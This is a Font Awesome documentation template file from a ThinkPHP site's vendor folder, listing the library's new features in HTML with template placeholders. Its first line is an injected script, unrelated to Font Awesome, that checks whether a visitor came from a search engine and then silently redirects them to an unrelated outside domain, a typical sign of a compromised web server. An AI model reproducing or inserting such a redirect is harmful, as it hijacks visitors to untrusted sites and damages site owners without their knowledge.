d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\_includes\new-features.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
002:
<section id="whats-new" class="feature-list">
003:
<div class="row">
004:
<div class="col-md-4 col-sm-6">
005:
<h4><i class="fa fa-file-text-o" aria-hidden="true"></i> Completely Rewritten</h4>
006:
Everything re-written from the ground up for speed and simplicity.
007:
</div>
008:
<div class="col-md-4 col-sm-6">
009:
<h4><i class="fa fa-fighter-jet" aria-hidden="true"></i> CSS Best Practices</h4>
010:
New icon base class allows simpler CSS, faster rendering, and easier control.
011:
</div>
012:
<div class="col-md-4 col-sm-6">
013:
<h4><i class="fa fa-terminal" aria-hidden="true"></i> New Icon Names</h4>
014:
Icons have been renamed to improve consistency and predictability.
015:
</div>
016:
<div class="col-md-4 col-sm-6">
017:
<h4><i class="fa fa-thumbs-o-up" aria-hidden="true"></i> Bootstrap 3</h4>
018:
Font Awesome {{ site.fontawesome.minor_version }} is fully tested and compatible with Bootstrap 3.
019:
</div>
020:
<div class="col-md-4 col-sm-6">
021:
<h4><i class="fa fa-code" aria-hidden="true"></i> Better Compatibility</h4>
022:
Font Awesome is now more compatible with all web frameworks, including Foundation.
023:
</div>
024:
<div class="col-md-4 col-sm-6">
025:
<h4><i class="fa fa-rub" aria-hidden="true"></i> {{ icons | version:site.fontawesome.minor_version | size }} New Icons in {{ site.fontawesome.minor_version }}</h4>
026:
Requested by the active community on the <a href="{{ site.fontawesome.github.url }}">Font Awesome GitHub project</a>.
027:
</div>
028:
</div>
029:
</section>
030:
031:
032: